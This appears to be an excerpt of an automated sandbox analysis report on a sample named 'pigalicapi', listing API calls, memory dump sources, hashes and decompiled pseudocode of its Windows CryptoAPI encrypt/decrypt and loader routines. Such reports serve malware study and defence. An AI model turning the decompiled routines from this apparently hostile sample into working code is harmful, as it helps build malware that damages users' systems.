                                                                                                                                                                                                                                                                          0x04008b1c
                                                                                                                                                                                                                                                                          0x04008b37
                                                                                                                                                                                                                                                                          0x04008b3f
                                                                                                                                                                                                                                                                          0x04008b41
                                                                                                                                                                                                                                                                          0x04008b5e
                                                                                                                                                                                                                                                                          0x04008b66
                                                                                                                                                                                                                                                                          0x04008b80
                                                                                                                                                                                                                                                                          0x04008b87
                                                                                                                                                                                                                                                                          0x04008b87
                                                                                                                                                                                                                                                                          0x04008b91
                                                                                                                                                                                                                                                                          0x04008b91
                                                                                                                                                                                                                                                                          0x04008b9d
                                                                                                                                                                                                                                                                          0x04008b9d
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04008b16

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • CryptAcquireContextA.ADVAPI32(00000000,0400C6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000), ref: 04008AD3
                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 04008ADD
                                                                                                                                                                                                                                                                          • CryptAcquireContextA.ADVAPI32(00000000,0400C6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008), ref: 04008B0C
                                                                                                                                                                                                                                                                          • CryptImportKey.ADVAPI32(00000000,00000000,?,00000000,00000001,00000000), ref: 04008B37
                                                                                                                                                                                                                                                                          • CryptImportKey.ADVAPI32(00000000,00000000,00000000,00000000,00000001,00000000), ref: 04008B5E
                                                                                                                                                                                                                                                                          • CryptDecrypt.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00000000), ref: 04008B7A
                                                                                                                                                                                                                                                                          • CryptDestroyKey.ADVAPI32(00000000), ref: 04008B87
                                                                                                                                                                                                                                                                          • CryptDestroyKey.ADVAPI32(00000000), ref: 04008B91
                                                                                                                                                                                                                                                                          • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 04008B9D
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          • Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 04008AC4
                                                                                                                                                                                                                                                                          • Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 04008AFC
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000006.00000002.599674473.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.599568479.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.600041047.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.600183506.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_4000000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Crypt$Context$AcquireDestroyImport$DecryptErrorLastRelease
                                                                                                                                                                                                                                                                          • String ID: Microsoft Enhanced Cryptographic Provider v1.0$Microsoft Enhanced Cryptographic Provider v1.0
                                                                                                                                                                                                                                                                          • API String ID: 1555285084-947817771
                                                                                                                                                                                                                                                                          • Opcode ID: a29918078d8c2f64865fcd98cb153a1075290469360e4a9c607703ac9d42e64f
                                                                                                                                                                                                                                                                          • Instruction ID: 912f8c379191964defa89f3bac9fc05279983c51f6e5ced775be03f2308b6df6
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a29918078d8c2f64865fcd98cb153a1075290469360e4a9c607703ac9d42e64f
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5A31CDB5A04209EBFB58DF94D849BEE77B8FB48705F14C518F601B62C0C7B8A984CB61
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • LoadLibraryW.KERNEL32(10004054,10004040), ref: 10001047
                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 1000104E
                                                                                                                                                                                                                                                                            • Part of subcall function 10001B30: SetLastError.KERNEL32(0000000D,?,10001070,?,00000040), ref: 10001B3D
                                                                                                                                                                                                                                                                          • SetLastError.KERNEL32(000000C1), ref: 10001096
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000006.00000002.606973844.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_10001000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ErrorLast$AddressLibraryLoadProc
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 1866314245-0
                                                                                                                                                                                                                                                                          • Opcode ID: 3dc4c1101507dda9be7d1ca017cc9ed333707a61feece7f86d76402a0b178a7c
                                                                                                                                                                                                                                                                          • Instruction ID: de8a46b343c4f85be80e433d7a8ef3539ae306dd3111f157e8541b0b80b52991
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3dc4c1101507dda9be7d1ca017cc9ed333707a61feece7f86d76402a0b178a7c
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 44F1C3B4A01209EFEB04CF94C990A9EB7B5FF48384F208598E915AB395D735EE41DB90
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 040048EB
                                                                                                                                                                                                                                                                          • CryptHashData.ADVAPI32(00000000,?,00000010,00000000), ref: 0400490B
                                                                                                                                                                                                                                                                          • CryptDeriveKey.ADVAPI32(00000000,00006801,00000000,00000001,00000000), ref: 0400493C
                                                                                                                                                                                                                                                                          • CryptDecrypt.ADVAPI32(00000000,00000000,00000001,00000000,?,000002F0), ref: 0400496F
                                                                                                                                                                                                                                                                          • CryptDestroyKey.ADVAPI32(00000000), ref: 04004982
                                                                                                                                                                                                                                                                          • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,?), ref: 040049A9
                                                                                                                                                                                                                                                                          • CryptHashData.ADVAPI32(?,?,000002F0,00000000), ref: 040049CC
                                                                                                                                                                                                                                                                          • CryptGetHashParam.ADVAPI32(?,00000004,00000000,00000004,00000000), ref: 04004A07
                                                                                                                                                                                                                                                                          • CryptGetHashParam.ADVAPI32(?,00000002,?,00000010,00000000), ref: 04004A34
                                                                                                                                                                                                                                                                          • CryptDestroyHash.ADVAPI32(?), ref: 04004A7D
                                                                                                                                                                                                                                                                          • CryptDestroyHash.ADVAPI32(00000000), ref: 04004A8A
                                                                                                                                                                                                                                                                          • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 04004AA5
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000006.00000002.599674473.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.599568479.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.600041047.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.600183506.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_4000000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Crypt$Hash$Destroy$CreateDataParam$ContextDecryptDeriveRelease
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 2727466597-0
                                                                                                                                                                                                                                                                          • Opcode ID: 56f7e97ff9290496e290980ffb5b481f03a5a3792702acde3772e2a43a98712a
                                                                                                                                                                                                                                                                          • Instruction ID: 825b94236ad970d67c54706e51f03fb1cf2707309f33405f466b5fd67a115f37
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 56f7e97ff9290496e290980ffb5b481f03a5a3792702acde3772e2a43a98712a
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E251FD71A54318ABEB65CF50CC45FEA77BCAB48B04F008598F609B61C0DB79AB84CF54
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          C-Code - Quality: 82%
                                                                                                                                                                                                                                                                          			E04008970(intOrPtr _a4, intOrPtr* _a8, BYTE* _a12, int _a16) {
                                                                                                                                                                                                                                                                          				int _v8;
                                                                                                                                                                                                                                                                          				long* _v12;
                                                                                                                                                                                                                                                                          				long _v16;
                                                                                                                                                                                                                                                                          				long* _v20;
                                                                                                                                                                                                                                                                          				char* _t27;
                                                                                                                                                                                                                                                                          				int _t28;
                                                                                                                                                                                                                                                                          				int _t33;
                                                                                                                                                                                                                                                                          				char* _t47;
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                                                                                                                          				if(_a4 == 0 || _a8 == 0 || _a12 == 0 || _a16 == 0) {
                                                                                                                                                                                                                                                                          					L12:
                                                                                                                                                                                                                                                                          					return _v8;
                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                          					_v12 = 0;
                                                                                                                                                                                                                                                                          					_t27 =  *0x4013370; // 0x400c6e4
                                                                                                                                                                                                                                                                          					_t28 = CryptAcquireContextA( &_v12, _t27, "Microsoft Enhanced Cryptographic Provider v1.0", 1, 0); // executed
                                                                                                                                                                                                                                                                          					if(_t28 == 0) {
                                                                                                                                                                                                                                                                          						_v16 = GetLastError();
                                                                                                                                                                                                                                                                          						if(_v16 == 0x80090016 || _v16 == 0x8009000b) {
                                                                                                                                                                                                                                                                          							_t47 =  *0x4013370; // 0x400c6e4
                                                                                                                                                                                                                                                                          							CryptAcquireContextA( &_v12, _t47, "Microsoft Enhanced Cryptographic Provider v1.0", 1, 8);
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					if(_v12 != 0) {
                                                                                                                                                                                                                                                                          						_v20 = 0;
                                                                                                                                                                                                                                                                          						if(CryptImportKey(_v12, _a12, _a16, 0, 1,  &_v20) != 0) {
                                                                                                                                                                                                                                                                          							_t33 = _v20;
                                                                                                                                                                                                                                                                          							__imp__CryptEncrypt(_t33, 0, 1, 0, _a4, _a8,  *_a8);
                                                                                                                                                                                                                                                                          							_v8 = _t33;
                                                                                                                                                                                                                                                                          							CryptDestroyKey(_v20);
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						CryptReleaseContext(_v12, 0);
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					goto L12;
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          			}











                                                                                                                                                                                                                                                                          0x04008976
                                                                                                                                                                                                                                                                          0x04008981
                                                                                                                                                                                                                                                                          0x04008a60
                                                                                                                                                                                                                                                                          0x04008a66
                                                                                                                                                                                                                                                                          0x040089a5
                                                                                                                                                                                                                                                                          0x040089a5
                                                                                                                                                                                                                                                                          0x040089b5
                                                                                                                                                                                                                                                                          0x040089bf
                                                                                                                                                                                                                                                                          0x040089c7
                                                                                                                                                                                                                                                                          0x040089cf
                                                                                                                                                                                                                                                                          0x040089d9
                                                                                                                                                                                                                                                                          0x040089ed
                                                                                                                                                                                                                                                                          0x040089f8
                                                                                                                                                                                                                                                                          0x040089f8
                                                                                                                                                                                                                                                                          0x040089d9
                                                                                                                                                                                                                                                                          0x04008a02
                                                                                                                                                                                                                                                                          0x04008a04
                                                                                                                                                                                                                                                                          0x04008a27
                                                                                                                                                                                                                                                                          0x04008a3d
                                                                                                                                                                                                                                                                          0x04008a41
                                                                                                                                                                                                                                                                          0x04008a47
                                                                                                                                                                                                                                                                          0x04008a4e
                                                                                                                                                                                                                                                                          0x04008a4e
                                                                                                                                                                                                                                                                          0x04008a5a
                                                                                                                                                                                                                                                                          0x04008a5a
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04008a02

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • CryptAcquireContextA.ADVAPI32(00000000,0400C6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000), ref: 040089BF
                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 040089C9
                                                                                                                                                                                                                                                                          • CryptAcquireContextA.ADVAPI32(00000000,0400C6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008), ref: 040089F8
                                                                                                                                                                                                                                                                          • CryptImportKey.ADVAPI32(00000000,00000000,00000000,00000000,00000001,00000000), ref: 04008A1F
                                                                                                                                                                                                                                                                          • CryptEncrypt.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 04008A41
                                                                                                                                                                                                                                                                          • CryptDestroyKey.ADVAPI32(00000000), ref: 04008A4E
                                                                                                                                                                                                                                                                          • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 04008A5A
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          • Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 040089E8
                                                                                                                                                                                                                                                                          • Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 040089B0
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000006.00000002.599674473.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.599568479.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.600041047.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.600183506.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_4000000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Crypt$Context$Acquire$DestroyEncryptErrorImportLastRelease
                                                                                                                                                                                                                                                                          • String ID: Microsoft Enhanced Cryptographic Provider v1.0$Microsoft Enhanced Cryptographic Provider v1.0
                                                                                                                                                                                                                                                                          • API String ID: 3736710109-947817771
                                                                                                                                                                                                                                                                          • Opcode ID: a580c414a6f780aecf9ca1925e7721a486cca4ea517db96ead6d5debf2f75543
                                                                                                                                                                                                                                                                          • Instruction ID: 073036156a227ab269f6199982c6e62e9abf2561c3e32999b52b046b74d0c6c6
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a580c414a6f780aecf9ca1925e7721a486cca4ea517db96ead6d5debf2f75543
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D231FD75A40208EFFB54DFA4C849BAE77B9FB44701F14C658F605B62C0D7B8AA80CB51
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          C-Code - Quality: 51%
                                                                                                                                                                                                                                                                          			E00401000() {
                                                                                                                                                                                                                                                                          				char _v16;
                                                                                                                                                                                                                                                                          				char _v20;
                                                                                                                                                                                                                                                                          				char* _v48;
                                                                                                                                                                                                                                                                          				char _v52;
                                                                                                                                                                                                                                                                          				char* _v56;
                                                                                                                                                                                                                                                                          				void* _v60;
                                                                                                                                                                                                                                                                          				intOrPtr* _t18;
                                                                                                                                                                                                                                                                          				_Unknown_base(*)()* _t19;
                                                                                                                                                                                                                                                                          				intOrPtr* _t25;
                                                                                                                                                                                                                                                                          				void* _t30;
                                                                                                                                                                                                                                                                          				intOrPtr* _t31;
                                                                                                                                                                                                                                                                          				intOrPtr _t36;
                                                                                                                                                                                                                                                                          				void* _t38;
                                                                                                                                                                                                                                                                          				void* _t40;
                                                                                                                                                                                                                                                                          				void* _t41;
                                                                                                                                                                                                                                                                          				signed int _t42;
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				_t18 =  *0x404088; // 0x401c60
                                                                                                                                                                                                                                                                          				if(_t18 != 0) {
                                                                                                                                                                                                                                                                          					_v52 = 0;
                                                                                                                                                                                                                                                                          					_v56 = 2;
                                                                                                                                                                                                                                                                          					_v60 = 0;
                                                                                                                                                                                                                                                                          					 *_t18();
                                                                                                                                                                                                                                                                          					_t42 = _t42 - 0xc;
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				_v60 = E00401110; // executed
                                                                                                                                                                                                                                                                          				_t19 = SetUnhandledExceptionFilter(??); // executed
                                                                                                                                                                                                                                                                          				_push(_t19);
                                                                                                                                                                                                                                                                          				E00401DC8(E00401CE8(_t38));
                                                                                                                                                                                                                                                                          				_v20 = 0;
                                                                                                                                                                                                                                                                          				_v48 =  &_v20;
                                                                                                                                                                                                                                                                          				_v52 =  *0x403018;
                                                                                                                                                                                                                                                                          				_v56 =  &_v16;
                                                                                                                                                                                                                                                                          				_v60 = 0x405004;
                                                                                                                                                                                                                                                                          				 *_t42 = 0x405000;
                                                                                                                                                                                                                                                                          				L00402410();
                                                                                                                                                                                                                                                                          				_t25 =  *0x405038;
                                                                                                                                                                                                                                                                          				if(_t25 != 0) {
                                                                                                                                                                                                                                                                          					L4:
                                                                                                                                                                                                                                                                          					 *0x40301c = _t25;
                                                                                                                                                                                                                                                                          					_v60 = _t25;
                                                                                                                                                                                                                                                                          					_t36 = __imp___iob;
                                                                                                                                                                                                                                                                          					 *_t42 =  *((intOrPtr*)(_t36 + 0x10));
                                                                                                                                                                                                                                                                          					L00402430();
                                                                                                                                                                                                                                                                          					_v60 =  *0x405038;
                                                                                                                                                                                                                                                                          					 *_t42 =  *((intOrPtr*)(_t36 + 0x30));
                                                                                                                                                                                                                                                                          					L00402430();
                                                                                                                                                                                                                                                                          					_v60 =  *0x405038;
                                                                                                                                                                                                                                                                          					_t25 =  *((intOrPtr*)(_t36 + 0x50));
                                                                                                                                                                                                                                                                          					 *_t42 = _t25;
                                                                                                                                                                                                                                                                          					L00402430();
                                                                                                                                                                                                                                                                          					goto L3;
                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                          					L3:
                                                                                                                                                                                                                                                                          					L00402418();
                                                                                                                                                                                                                                                                          					 *_t25 =  *0x40301c;
                                                                                                                                                                                                                                                                          					_t30 = E00401F00(_t36, _t40, _t41);
                                                                                                                                                                                                                                                                          					_t42 = _t42 & 0xfffffff0;
                                                                                                                                                                                                                                                                          					_t31 = E00402148(_t30);
                                                                                                                                                                                                                                                                          					L00402420();
                                                                                                                                                                                                                                                                          					_v56 =  *_t31;
                                                                                                                                                                                                                                                                          					_v60 =  *0x405004;
                                                                                                                                                                                                                                                                          					 *_t42 =  *0x405000; // executed
                                                                                                                                                                                                                                                                          					_t25 = E0040216C( *0x40301c); // executed
                                                                                                                                                                                                                                                                          					L00402428();
                                                                                                                                                                                                                                                                          					 *_t42 = _t25;
                                                                                                                                                                                                                                                                          					ExitProcess(??);
                                                                                                                                                                                                                                                                          					goto L4;
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          			}



















                                                                                                                                                                                                                                                                          0x00401007
                                                                                                                                                                                                                                                                          0x0040100e
                                                                                                                                                                                                                                                                          0x00401010
                                                                                                                                                                                                                                                                          0x00401018
                                                                                                                                                                                                                                                                          0x00401020
                                                                                                                                                                                                                                                                          0x00401027
                                                                                                                                                                                                                                                                          0x00401029
                                                                                                                                                                                                                                                                          0x00401029
                                                                                                                                                                                                                                                                          0x0040102c
                                                                                                                                                                                                                                                                          0x00401033
                                                                                                                                                                                                                                                                          0x00401038
                                                                                                                                                                                                                                                                          0x0040103e
                                                                                                                                                                                                                                                                          0x00401043
                                                                                                                                                                                                                                                                          0x0040104d
                                                                                                                                                                                                                                                                          0x00401056
                                                                                                                                                                                                                                                                          0x0040105d
                                                                                                                                                                                                                                                                          0x00401061
                                                                                                                                                                                                                                                                          0x00401069
                                                                                                                                                                                                                                                                          0x00401070
                                                                                                                                                                                                                                                                          0x00401075
                                                                                                                                                                                                                                                                          0x0040107c
                                                                                                                                                                                                                                                                          0x004010c8
                                                                                                                                                                                                                                                                          0x004010c8
                                                                                                                                                                                                                                                                          0x004010cd
                                                                                                                                                                                                                                                                          0x004010d1
                                                                                                                                                                                                                                                                          0x004010da
                                                                                                                                                                                                                                                                          0x004010dd
                                                                                                                                                                                                                                                                          0x004010e7
                                                                                                                                                                                                                                                                          0x004010ee
                                                                                                                                                                                                                                                                          0x004010f1
                                                                                                                                                                                                                                                                          0x004010fb
                                                                                                                                                                                                                                                                          0x004010ff
                                                                                                                                                                                                                                                                          0x00401102
                                                                                                                                                                                                                                                                          0x00401105
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x0040107e
                                                                                                                                                                                                                                                                          0x0040107e
                                                                                                                                                                                                                                                                          0x0040107e
                                                                                                                                                                                                                                                                          0x00401089
                                                                                                                                                                                                                                                                          0x0040108b
                                                                                                                                                                                                                                                                          0x00401090
                                                                                                                                                                                                                                                                          0x00401093
                                                                                                                                                                                                                                                                          0x00401098
                                                                                                                                                                                                                                                                          0x0040109f
                                                                                                                                                                                                                                                                          0x004010a8
                                                                                                                                                                                                                                                                          0x004010b1
                                                                                                                                                                                                                                                                          0x004010b4
                                                                                                                                                                                                                                                                          0x004010bb
                                                                                                                                                                                                                                                                          0x004010c0
                                                                                                                                                                                                                                                                          0x004010c3
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x004010c3

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000006.00000002.558505777.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.558382730.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.558681103.0000000000404000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.558864837.0000000000406000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.559037175.0000000000409000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.559758809.0000000000420000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_400000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: _setmode$ExceptionExitFilterProcessUnhandled__getmainargs__p__environ__p__fmode_cexit
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 3695137517-0
                                                                                                                                                                                                                                                                          • Opcode ID: c06788a4494e1d2675dd5dd0aa7ee8a04c7ee4f1323cc2b481735e636d9d2198
                                                                                                                                                                                                                                                                          • Instruction ID: 5314c48efd062ef50f6f18183d7c37668516cd49ce0ee3545be6121dab1d6748
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c06788a4494e1d2675dd5dd0aa7ee8a04c7ee4f1323cc2b481735e636d9d2198
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9A21E8B45057009FC700EF79D68961EBBE4BF44308F40983EE984A7395D778D8449F5A
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000006.00000002.558505777.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.558382730.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.558681103.0000000000404000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.558864837.0000000000406000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.559037175.0000000000409000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.559758809.0000000000420000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_400000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: AccessAllocateFindMemoryResourceResource_Virtual
                                                                                                                                                                                                                                                                          • String ID: $@@$@$BWONAD
                                                                                                                                                                                                                                                                          • API String ID: 2485490239-207724474
                                                                                                                                                                                                                                                                          • Opcode ID: 1e933e0ed077e168773f665c03ba50cbef35de6cb0efad7f213f85bcee16254c
                                                                                                                                                                                                                                                                          • Instruction ID: 811c5ae7d21e0ee4240d1f8525f1dfe1deae8c0cebef189c32f944b86f782d2c
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1e933e0ed077e168773f665c03ba50cbef35de6cb0efad7f213f85bcee16254c
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1631D2B4D042099FDB00DFA9C4407DEBBF4EB49314F10C5AAD958B7340D7789A488FA5
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          C-Code - Quality: 87%
                                                                                                                                                                                                                                                                          			E04009F70(intOrPtr _a4, signed int _a8, intOrPtr* _a12) {
                                                                                                                                                                                                                                                                          				intOrPtr _v8;
                                                                                                                                                                                                                                                                          				void* _v12;
                                                                                                                                                                                                                                                                          				void* _v16;
                                                                                                                                                                                                                                                                          				signed int _v20;
                                                                                                                                                                                                                                                                          				intOrPtr _v24;
                                                                                                                                                                                                                                                                          				intOrPtr* _v28;
                                                                                                                                                                                                                                                                          				void* _v32;
                                                                                                                                                                                                                                                                          				intOrPtr* _t59;
                                                                                                                                                                                                                                                                          				intOrPtr _t64;
                                                                                                                                                                                                                                                                          				void* _t99;
                                                                                                                                                                                                                                                                          				void* _t100;
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				_v8 = 1;
                                                                                                                                                                                                                                                                          				if(_a4 != 0) {
                                                                                                                                                                                                                                                                          					_t103 = _a8 - 5;
                                                                                                                                                                                                                                                                          					if(_a8 > 5) {
                                                                                                                                                                                                                                                                          						asm("cdq");
                                                                                                                                                                                                                                                                          						_t59 = E040097A0( ~(0 | _t103 > 0x00000000) | _a8 / 0x00000006 * 0x00000288); // executed
                                                                                                                                                                                                                                                                          						_t100 = _t99 + 4;
                                                                                                                                                                                                                                                                          						_v28 = _t59;
                                                                                                                                                                                                                                                                          						_v12 = _v28;
                                                                                                                                                                                                                                                                          						if(_v12 != 0) {
                                                                                                                                                                                                                                                                          							_v16 = _v12;
                                                                                                                                                                                                                                                                          							_v20 = _a8 * 0x288 / 6;
                                                                                                                                                                                                                                                                          							_push( &_v20);
                                                                                                                                                                                                                                                                          							_t64 = _v12;
                                                                                                                                                                                                                                                                          							_push(_t64); // executed
                                                                                                                                                                                                                                                                          							L0400B1DA(); // executed
                                                                                                                                                                                                                                                                          							if(_t64 == 0) {
                                                                                                                                                                                                                                                                          								_v24 = 0;
                                                                                                                                                                                                                                                                          								while(_v12 != 0 && _v24 < _a8) {
                                                                                                                                                                                                                                                                          									if( *((intOrPtr*)(_v12 + 0x190)) < _a8 - _v24) {
                                                                                                                                                                                                                                                                          										E04007B70(_a4 + _v24, _v12 + 0x194,  *((intOrPtr*)(_v12 + 0x190)));
                                                                                                                                                                                                                                                                          										_t100 = _t100 + 0xc;
                                                                                                                                                                                                                                                                          										_v24 = _v24 +  *((intOrPtr*)(_v12 + 0x190));
                                                                                                                                                                                                                                                                          										_v12 =  *_v12;
                                                                                                                                                                                                                                                                          										_v8 = 1;
                                                                                                                                                                                                                                                                          										continue;
                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                          									break;
                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                          								 *_a12 = _v24;
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          							_v32 = _v16;
                                                                                                                                                                                                                                                                          							E040097C0(_v32);
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				return _v8;
                                                                                                                                                                                                                                                                          			}














                                                                                                                                                                                                                                                                          0x04009f76
                                                                                                                                                                                                                                                                          0x04009f81
                                                                                                                                                                                                                                                                          0x04009f87
                                                                                                                                                                                                                                                                          0x04009f8b
